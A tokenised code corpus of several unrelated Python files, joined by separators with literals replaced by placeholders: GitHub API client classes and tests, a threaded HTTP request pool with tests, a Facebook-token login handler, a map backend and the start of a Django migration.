<s> from . base import BaseSerializer <EOL> import json <EOL> import os <EOL> class JSONSerializer ( BaseSerializer ) : <EOL> name = '<STR_LIT>' <EOL> @ staticmethod <EOL> def generate_cassette_name ( cassette_library_dir , cassette_name ) : <EOL> return os . path . join ( cassette_library_dir , <EOL> '<STR_LIT>' . format ( cassette_name , '<STR_LIT>' ) ) <EOL> def serialize ( self , cassette_data ) : <EOL> return json . dumps ( cassette_data ) <EOL> def deserialize ( self , cassette_data ) : <EOL> try : <EOL> deserialized_data = json . loads ( cassette_data ) <EOL> except ValueError : <EOL> deserialized_data = { } <EOL> return deserialized_data </s>
<s> from betamax import Betamax <EOL> from tests . integration . helper import IntegrationHelper <EOL> class TestUnicode ( IntegrationHelper ) : <EOL> def test_unicode_is_saved_properly ( self ) : <EOL> s = self . session <EOL> url = '<STR_LIT>' <EOL> with Betamax ( s ) . use_cassette ( '<STR_LIT>' ) as beta : <EOL> self . cassette_path = beta . current_cassette . cassette_path <EOL> s . get ( url ) </s>
<s> """<STR_LIT>""" <EOL> from . __about__ import ( <EOL> __package_name__ , __title__ , __author__ , __author_email__ , <EOL> __license__ , __copyright__ , __version__ , __version_info__ , <EOL> __url__ , <EOL> ) <EOL> from . api import ( <EOL> all_events , <EOL> all_repositories , <EOL> all_users , <EOL> authorize , <EOL> create_gist , <EOL> emojis , <EOL> enterprise_login , <EOL> followed_by , <EOL> followers_of , <EOL> gist , <EOL> gists_by , <EOL> gitignore_template , <EOL> gitignore_templates , <EOL> issue , <EOL> issues_on , <EOL> login , <EOL> markdown , <EOL> octocat , <EOL> organization , <EOL> organizations_with , <EOL> public_gists , <EOL> pull_request , <EOL> rate_limit , <EOL> repositories_by , <EOL> repository , <EOL> search_code , <EOL> search_issues , <EOL> search_repositories , <EOL> search_users , <EOL> starred_by , <EOL> subscriptions_for , <EOL> user , <EOL> zen <EOL> ) <EOL> from . github import GitHub , GitHubEnterprise , GitHubStatus <EOL> from . exceptions import GitHubError <EOL> __all__ = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:user>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from json import dumps <EOL> from . . models import GitHubCore <EOL> from . commit import RepoCommit <EOL> class Branch ( GitHubCore ) : <EOL> """<STR_LIT>""" <EOL> PREVIEW_HEADERS = { '<STR_LIT>' : '<STR_LIT>' } <EOL> def _update_attributes ( self , branch ) : <EOL> self . name = branch . get ( '<STR_LIT:name>' ) <EOL> self . commit = branch . get ( '<STR_LIT>' ) <EOL> if self . commit : <EOL> self . commit = RepoCommit ( self . commit , self ) <EOL> self . links = branch . get ( '<STR_LIT>' , { } ) <EOL> self . protection = branch . get ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . links : <EOL> self . _api = self . links [ '<STR_LIT>' ] <EOL> else : <EOL> base = self . commit . url . split ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . _api = self . _build_url ( '<STR_LIT>' , self . name , base_url = base ) <EOL> def _repr ( self ) : <EOL> return '<STR_LIT>' . format ( self . name ) <EOL> def latest_sha ( self , differs_from = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( differs_from ) <EOL> } <EOL> base = self . _api . split ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> url = self . _build_url ( '<STR_LIT>' , self . name , base_url = base ) <EOL> resp = self . _get ( url , headers = headers ) <EOL> if self . _boolean ( resp , <NUM_LIT:200> , <NUM_LIT> ) : <EOL> return resp . content <EOL> return None <EOL> def protect ( self , enforcement = None , status_checks = None ) : <EOL> """<STR_LIT>""" <EOL> previous_values = self . protection [ '<STR_LIT>' ] <EOL> if enforcement is None : <EOL> enforcement = previous_values [ '<STR_LIT>' ] <EOL> if status_checks is None : <EOL> status_checks = previous_values [ '<STR_LIT>' ] <EOL> edit = { '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : { <EOL> '<STR_LIT>' : enforcement , '<STR_LIT>' : status_checks } } } <EOL> json = self . _json ( self . _patch ( self . 
_api , data = dumps ( edit ) , <EOL> headers = self . PREVIEW_HEADERS ) , <NUM_LIT:200> ) <EOL> self . _update_attributes ( json ) <EOL> return True <EOL> def unprotect ( self ) : <EOL> """<STR_LIT>""" <EOL> edit = { '<STR_LIT>' : { '<STR_LIT>' : False } } <EOL> json = self . _json ( self . _patch ( self . _api , data = dumps ( edit ) , <EOL> headers = self . PREVIEW_HEADERS ) , <NUM_LIT:200> ) <EOL> self . _update_attributes ( json ) <EOL> return True </s>
<s> from io import BytesIO <EOL> import os <EOL> import sys <EOL> def path ( name , mode = '<STR_LIT:r>' ) : <EOL> return open ( '<STR_LIT>' . format ( name ) , mode ) <EOL> def content ( path_name ) : <EOL> content = path ( path_name ) . read ( ) . strip ( ) <EOL> iterable = '<STR_LIT>' . format ( content ) <EOL> if sys . version_info > ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> content = content . encode ( ) <EOL> iterable = iterable . encode ( ) <EOL> return BytesIO ( content ) , BytesIO ( iterable ) <EOL> default = { } <EOL> iterable = { } <EOL> for file in os . listdir ( '<STR_LIT>' ) : <EOL> default [ file ] , iterable [ file ] = content ( file ) </s>
<s> import os <EOL> import github3 <EOL> import pytest <EOL> from github3 import repos <EOL> from tests . utils import ( BaseCase , load , mock ) <EOL> class TestAsset ( BaseCase ) : <EOL> def __init__ ( self , methodName = '<STR_LIT>' ) : <EOL> super ( TestAsset , self ) . __init__ ( methodName ) <EOL> self . asset = repos . release . Asset ( load ( '<STR_LIT>' ) ) <EOL> self . api = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ pytest . mark . xfail <EOL> def test_download ( self ) : <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . response ( '<STR_LIT>' , <NUM_LIT:200> , ** headers ) <EOL> self . get ( self . api ) <EOL> self . conf . update ( { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } ) <EOL> assert os . path . isfile ( '<STR_LIT:foo>' ) is False <EOL> assert self . asset . download ( ) <EOL> assert os . path . isfile ( '<STR_LIT:foo>' ) <EOL> os . unlink ( '<STR_LIT:foo>' ) <EOL> self . mock_assertions ( ) <EOL> self . request . return_value . raw . seek ( <NUM_LIT:0> ) <EOL> self . request . return_value . _content_consumed = False <EOL> assert os . path . isfile ( '<STR_LIT>' ) is False <EOL> assert self . asset . download ( '<STR_LIT>' ) <EOL> assert os . path . isfile ( '<STR_LIT>' ) <EOL> os . unlink ( '<STR_LIT>' ) <EOL> self . mock_assertions ( ) <EOL> self . request . return_value . raw . seek ( <NUM_LIT:0> ) <EOL> self . request . return_value . _content_consumed = False <EOL> o = mock . mock_open ( ) <EOL> with mock . patch ( '<STR_LIT>' . format ( __name__ ) , o , create = True ) : <EOL> with open ( '<STR_LIT>' , '<STR_LIT>' ) as fd : <EOL> self . asset . download ( fd ) <EOL> o . assert_called_once_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fd = o ( ) <EOL> fd . write . assert_called_once_with ( b'<STR_LIT>' ) <EOL> self . mock_assertions ( ) <EOL> self . request . return_value . raw . seek ( <NUM_LIT:0> ) <EOL> self . request . return_value . 
_content_consumed = False <EOL> r = self . request . return_value <EOL> target = '<STR_LIT>' <EOL> self . response ( '<STR_LIT>' , <NUM_LIT> , location = target ) <EOL> self . get ( target ) <EOL> self . request . side_effect = [ self . request . return_value , r ] <EOL> self . conf [ '<STR_LIT>' ] . update ( { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:Content-Type>' : None , <EOL> } ) <EOL> del self . conf [ '<STR_LIT>' ] <EOL> o = mock . mock_open ( ) <EOL> with mock . patch ( '<STR_LIT>' . format ( __name__ ) , o , create = True ) : <EOL> with open ( '<STR_LIT>' , '<STR_LIT>' ) as fd : <EOL> self . asset . download ( fd ) <EOL> o . assert_called_once_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fd = o ( ) <EOL> fd . write . assert_called_once_with ( b'<STR_LIT>' ) <EOL> self . mock_assertions ( ) <EOL> self . response ( '<STR_LIT>' , <NUM_LIT> ) <EOL> self . request . side_effect = None <EOL> assert self . asset . download ( ) is False </s>
<s> import pytest <EOL> import github3 <EOL> from . import helper <EOL> url_for = helper . create_url_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> github_url_for = helper . create_url_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> key_url_for = helper . create_url_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> get_authenticated_user_example_data = helper . create_example_data_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> get_users_example_data = helper . create_example_data_helper ( '<STR_LIT>' ) <EOL> get_user_key_example_data = helper . create_example_data_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> example_data = get_users_example_data ( ) <EOL> class TestUser ( helper . UnitHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . User <EOL> example_data = get_users_example_data ( ) <EOL> def test_equality ( self ) : <EOL> """<STR_LIT>""" <EOL> user = github3 . users . User ( get_users_example_data ( ) ) <EOL> self . instance == user <EOL> user . _uniq += <NUM_LIT:1> <EOL> assert self . instance != user <EOL> def test_str ( self ) : <EOL> """<STR_LIT>""" <EOL> assert str ( self . instance ) == '<STR_LIT>' <EOL> assert repr ( self . instance ) == '<STR_LIT>' <EOL> def test_is_assignee_on ( self ) : <EOL> """<STR_LIT>""" <EOL> self . instance . is_assignee_on ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . session . get . assert_called_once_with ( <EOL> github_url_for ( '<STR_LIT>' ) <EOL> ) <EOL> def test_is_following ( self ) : <EOL> """<STR_LIT>""" <EOL> self . instance . is_following ( '<STR_LIT>' ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) <EOL> ) <EOL> class TestUserKeyRequiresAuth ( helper . UnitRequiresAuthenticationHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . Key <EOL> example_data = get_user_key_example_data ( ) <EOL> def test_update ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_requires_auth ( self . instance . 
update , title = '<STR_LIT>' , <EOL> key = '<STR_LIT>' ) <EOL> def test_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_requires_auth ( self . instance . delete ) <EOL> class TestUserKey ( helper . UnitHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . Key <EOL> example_data = get_user_key_example_data ( ) <EOL> def test_equality ( self ) : <EOL> """<STR_LIT>""" <EOL> key = github3 . users . Key ( get_user_key_example_data ( ) ) <EOL> assert self . instance == key <EOL> key . _uniq += "<STR_LIT>" <EOL> assert self . instance != key <EOL> def test_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> assert str ( self . instance ) == self . instance . key <EOL> assert repr ( self . instance ) . startswith ( '<STR_LIT>' ) <EOL> def test_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . instance . delete ( ) <EOL> assert self . session . delete . called is True <EOL> def test_update ( self ) : <EOL> """<STR_LIT>""" <EOL> data = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : '<STR_LIT>' <EOL> } <EOL> self . instance . update ( ** data ) <EOL> self . patch_called_with ( <EOL> key_url_for ( '<STR_LIT:1>' ) , <EOL> data = data <EOL> ) <EOL> class TestUserIterators ( helper . UnitIteratorHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . User <EOL> example_data = example_data . copy ( ) <EOL> def test_events ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . events ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_followers ( self ) : <EOL> """<STR_LIT>""" <EOL> f = self . instance . followers ( ) <EOL> self . get_next ( f ) <EOL> self . session . get . 
assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_following ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . following ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_keys ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . keys ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_organization_events ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . organization_events ( '<STR_LIT>' ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_organization_events_requires_an_org ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . organization_events ( None ) <EOL> with pytest . raises ( StopIteration ) : <EOL> next ( i ) <EOL> def test_organizations ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . organizations ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_received_events ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . received_events ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_received_events_public_only ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . received_events ( True ) <EOL> self . 
get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_starred_repositories ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . starred_repositories ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> def test_subscriptions ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . subscriptions ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> class TestUsersRequiresAuth ( helper . UnitRequiresAuthenticationHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . User <EOL> example_data = example_data . copy ( ) <EOL> def test_organization_events ( self ) : <EOL> """<STR_LIT>""" <EOL> with pytest . raises ( github3 . GitHubError ) : <EOL> self . instance . organization_events ( '<STR_LIT:foo>' ) <EOL> class TestPlan ( helper . UnitGitHubObjectHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . Plan <EOL> example_data = get_authenticated_user_example_data ( ) [ '<STR_LIT>' ] <EOL> def test_str ( self ) : <EOL> """<STR_LIT>""" <EOL> assert str ( self . instance ) == self . instance . name <EOL> assert repr ( self . instance ) == '<STR_LIT>' . format ( self . instance . name ) <EOL> def test_is_free ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . instance . is_free ( ) is False </s>
<s> """<STR_LIT>""" <EOL> from . import pool <EOL> from . . _compat import queue <EOL> def map ( requests , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> if not ( requests and all ( isinstance ( r , dict ) for r in requests ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> job_queue = queue . Queue ( ) <EOL> for request in requests : <EOL> job_queue . put ( request ) <EOL> kwargs [ '<STR_LIT>' ] = job_queue <EOL> threadpool = pool . Pool ( ** kwargs ) <EOL> threadpool . join_all ( ) <EOL> return threadpool . responses ( ) , threadpool . exceptions ( ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import queue <EOL> except ImportError : <EOL> import Queue as queue <EOL> import unittest <EOL> import mock <EOL> import pytest <EOL> from requests_toolbelt . threaded import pool <EOL> from requests_toolbelt . threaded import thread <EOL> class TestPool ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_requires_positive_number_of_processes ( self ) : <EOL> """<STR_LIT>""" <EOL> with pytest . raises ( ValueError ) : <EOL> pool . Pool ( None , num_processes = <NUM_LIT:0> ) <EOL> with pytest . raises ( ValueError ) : <EOL> pool . Pool ( None , num_processes = - <NUM_LIT:1> ) <EOL> def test_number_of_processes_can_be_arbitrary ( self ) : <EOL> """<STR_LIT>""" <EOL> p = pool . Pool ( None , num_processes = <NUM_LIT:100> ) <EOL> assert p . _processes == <NUM_LIT:100> <EOL> assert len ( p . _pool ) == <NUM_LIT:100> <EOL> p = pool . Pool ( None , num_processes = <NUM_LIT:1> ) <EOL> assert p . _processes == <NUM_LIT:1> <EOL> assert len ( p . _pool ) == <NUM_LIT:1> <EOL> def test_initializer_is_called ( self ) : <EOL> """<STR_LIT>""" <EOL> initializer = mock . MagicMock ( ) <EOL> pool . Pool ( None , num_processes = <NUM_LIT:1> , initializer = initializer ) <EOL> assert initializer . called is True <EOL> initializer . assert_called_once_with ( mock . ANY ) <EOL> def test_auth_generator_is_called ( self ) : <EOL> """<STR_LIT>""" <EOL> auth_generator = mock . MagicMock ( ) <EOL> pool . Pool ( None , num_processes = <NUM_LIT:1> , auth_generator = auth_generator ) <EOL> assert auth_generator . called is True <EOL> auth_generator . assert_called_once_with ( mock . ANY ) <EOL> def test_session_is_called ( self ) : <EOL> """<STR_LIT>""" <EOL> session = mock . MagicMock ( ) <EOL> pool . Pool ( None , num_processes = <NUM_LIT:1> , session = session ) <EOL> assert session . called is True <EOL> session . 
assert_called_once_with ( ) <EOL> def test_from_exceptions_populates_a_queue ( self ) : <EOL> """<STR_LIT>""" <EOL> urls = [ "<STR_LIT>" . format ( n ) for n in range ( <NUM_LIT:5> ) ] <EOL> Exc = pool . ThreadException <EOL> excs = ( Exc ( { '<STR_LIT>' : '<STR_LIT:GET>' , '<STR_LIT:url>' : url } , None ) for url in urls ) <EOL> job_queue = mock . MagicMock ( ) <EOL> with mock . patch . object ( queue , '<STR_LIT>' , return_value = job_queue ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> pool . Pool . from_exceptions ( excs ) <EOL> assert job_queue . put . call_count == <NUM_LIT:5> <EOL> assert job_queue . put . mock_calls == [ <EOL> mock . call ( { '<STR_LIT>' : '<STR_LIT:GET>' , '<STR_LIT:url>' : url } ) <EOL> for url in urls <EOL> ] <EOL> def test_from_urls_constructs_get_requests ( self ) : <EOL> """<STR_LIT>""" <EOL> urls = [ "<STR_LIT>" . format ( n ) for n in range ( <NUM_LIT:5> ) ] <EOL> job_queue = mock . MagicMock ( ) <EOL> with mock . patch . object ( queue , '<STR_LIT>' , return_value = job_queue ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> pool . Pool . from_urls ( urls ) <EOL> assert job_queue . put . call_count == <NUM_LIT:5> <EOL> assert job_queue . put . mock_calls == [ <EOL> mock . call ( { '<STR_LIT>' : '<STR_LIT:GET>' , '<STR_LIT:url>' : url } ) <EOL> for url in urls <EOL> ] <EOL> def test_from_urls_constructs_get_requests_with_kwargs ( self ) : <EOL> """<STR_LIT>""" <EOL> def merge ( * args ) : <EOL> final = { } <EOL> for d in args : <EOL> final . update ( d ) <EOL> return final <EOL> urls = [ "<STR_LIT>" . format ( n ) for n in range ( <NUM_LIT:5> ) ] <EOL> kwargs = { '<STR_LIT>' : True , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:application/json>' } } <EOL> job_queue = mock . MagicMock ( ) <EOL> with mock . patch . object ( queue , '<STR_LIT>' , return_value = job_queue ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> pool . Pool . 
from_urls ( urls , kwargs ) <EOL> assert job_queue . put . call_count == <NUM_LIT:5> <EOL> assert job_queue . put . mock_calls == [ <EOL> mock . call ( merge ( { '<STR_LIT>' : '<STR_LIT:GET>' , '<STR_LIT:url>' : url } , kwargs ) ) <EOL> for url in urls <EOL> ] <EOL> def test_join_all ( self ) : <EOL> """<STR_LIT>""" <EOL> session_threads = [ ] <EOL> def _side_effect ( * args , ** kwargs ) : <EOL> thread = mock . MagicMock ( ) <EOL> session_threads . append ( thread ) <EOL> return thread <EOL> with mock . patch . object ( thread , '<STR_LIT>' , <EOL> side_effect = _side_effect ) : <EOL> pool . Pool ( None ) . join_all ( ) <EOL> for st in session_threads : <EOL> st . join . assert_called_once_with ( ) <EOL> def test_get_response_returns_thread_response ( self ) : <EOL> """<STR_LIT>""" <EOL> queues = [ ] <EOL> def _side_effect ( ) : <EOL> q = mock . MagicMock ( ) <EOL> q . get_nowait . return_value = ( { } , None ) <EOL> queues . append ( q ) <EOL> return q <EOL> with mock . patch . object ( queue , '<STR_LIT>' , side_effect = _side_effect ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> assert len ( queues ) == <NUM_LIT:2> <EOL> assert isinstance ( p . get_response ( ) , pool . ThreadResponse ) <EOL> assert len ( [ q for q in queues if q . get_nowait . called ] ) == <NUM_LIT:1> <EOL> def test_get_exception_returns_thread_exception ( self ) : <EOL> """<STR_LIT>""" <EOL> queues = [ ] <EOL> def _side_effect ( ) : <EOL> q = mock . MagicMock ( ) <EOL> q . get_nowait . return_value = ( { } , None ) <EOL> queues . append ( q ) <EOL> return q <EOL> with mock . patch . object ( queue , '<STR_LIT>' , side_effect = _side_effect ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> assert len ( queues ) == <NUM_LIT:2> <EOL> assert isinstance ( p . get_exception ( ) , pool . ThreadException ) <EOL> assert len ( [ q for q in queues if q . get_nowait . 
called ] ) == <NUM_LIT:1> <EOL> def test_get_response_returns_none_when_queue_is_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> queues = [ ] <EOL> def _side_effect ( ) : <EOL> q = mock . MagicMock ( ) <EOL> q . get_nowait . side_effect = queue . Empty ( ) <EOL> queues . append ( q ) <EOL> return q <EOL> with mock . patch . object ( queue , '<STR_LIT>' , side_effect = _side_effect ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> assert len ( queues ) == <NUM_LIT:2> <EOL> assert p . get_response ( ) is None <EOL> assert len ( [ q for q in queues if q . get_nowait . called ] ) == <NUM_LIT:1> <EOL> def test_get_exception_returns_none_when_queue_is_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> queues = [ ] <EOL> def _side_effect ( ) : <EOL> q = mock . MagicMock ( ) <EOL> q . get_nowait . side_effect = queue . Empty ( ) <EOL> queues . append ( q ) <EOL> return q <EOL> with mock . patch . object ( queue , '<STR_LIT>' , side_effect = _side_effect ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> assert len ( queues ) == <NUM_LIT:2> <EOL> assert p . get_exception ( ) is None <EOL> assert len ( [ q for q in queues if q . get_nowait . called ] ) == <NUM_LIT:1> <EOL> def test_lists_are_correctly_returned ( self ) : <EOL> """<STR_LIT>""" <EOL> def _make_queue ( ) : <EOL> q = queue . Queue ( ) <EOL> q . put ( ( { } , None ) ) <EOL> return q <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> p . _response_queue = _make_queue ( ) <EOL> p . _exc_queue = _make_queue ( ) <EOL> excs = list ( p . exceptions ( ) ) <EOL> assert len ( excs ) == <NUM_LIT:1> <EOL> for exc in excs : <EOL> assert isinstance ( exc , pool . ThreadException ) <EOL> resps = list ( p . responses ( ) ) <EOL> assert len ( resps ) == <NUM_LIT:1> <EOL> for resp in resps : <EOL> assert isinstance ( resp , pool . ThreadResponse ) </s>
<s> """<STR_LIT>""" <EOL> from indico . utils . auth . auth_utils import auth , user_hash <EOL> from indico . utils . auth . facebook_utils import check_access_token <EOL> from indico . error import FacebookTokenError <EOL> from indico . utils import unpack , mongo_callback , type_check <EOL> from indico . routes . handler import IndicoHandler <EOL> from indico . db import current_time <EOL> import indico . db . user_db as UserDB <EOL> import indico . db . auth_db as AuthDB <EOL> class AuthHandler ( IndicoHandler ) : <EOL> @ unpack ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:user>" ) <EOL> @ type_check ( str , str , dict ) <EOL> def login ( self , access_token , oauth_id , user ) : <EOL> if not check_access_token ( access_token ) : <EOL> raise FacebookTokenError ( ) <EOL> @ mongo_callback ( self ) <EOL> def sync_callback ( result ) : <EOL> self . respond ( { <EOL> "<STR_LIT:user>" : result , <EOL> "<STR_LIT>" : indico_key <EOL> } ) <EOL> @ mongo_callback ( self ) <EOL> def find_callback ( result ) : <EOL> if not result : <EOL> user [ "<STR_LIT>" ] = current_time ( ) <EOL> UserDB . sync_user ( user , "<STR_LIT>" + oauth_id , sync_callback ) <EOL> @ mongo_callback ( self ) <EOL> def save_key_callback ( result ) : <EOL> UserDB . find_user ( user_id , find_callback ) <EOL> user_id = "<STR_LIT>" + oauth_id <EOL> indico_key = user_hash ( user_id ) <EOL> AuthDB . save_key ( indico_key , user_id , save_key_callback ) <EOL> @ auth <EOL> def check ( self , data ) : <EOL> self . respond ( True ) <EOL> AuthRoute = ( r"<STR_LIT>" , AuthHandler ) </s>
<s> import sys <EOL> sys . stdout . write ( '<STR_LIT>' % sys . argv [ <NUM_LIT:2> ] ) <EOL> sys . stderr . write ( '<STR_LIT>' % sys . argv [ <NUM_LIT:2> ] ) <EOL> sys . exit ( int ( sys . argv [ <NUM_LIT:1> ] ) ) </s>
<s> from __future__ import unicode_literals <EOL> from collections import OrderedDict <EOL> try : <EOL> from urllib import urlencode <EOL> except ImportError : <EOL> from urllib . parse import urlencode <EOL> from django . conf import settings <EOL> from . base import BaseMapBackend <EOL> class YandexMapBackend ( BaseMapBackend ) : <EOL> NAME = '<STR_LIT>' <EOL> API_URL = '<STR_LIT>' <EOL> def get_api_js ( self ) : <EOL> params = OrderedDict ( ) <EOL> params [ '<STR_LIT>' ] = settings . LANGUAGE_CODE <EOL> if self . API_KEY : <EOL> params [ '<STR_LIT>' ] = self . API_KEY <EOL> return '<STR_LIT>' . format ( js_lib = self . API_URL , params = urlencode ( params ) ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import users . models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterModelManagers ( <EOL> name = '<STR_LIT>' , <EOL> managers = [ <EOL> ( '<STR_LIT>' , users . models . CustomUserManager ( ) ) , <EOL> ] , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ManyToManyField ( related_name = '<STR_LIT>' , verbose_name = '<STR_LIT>' , blank = True , to = '<STR_LIT>' , related_query_name = '<STR_LIT:user>' , help_text = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( default = False ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . 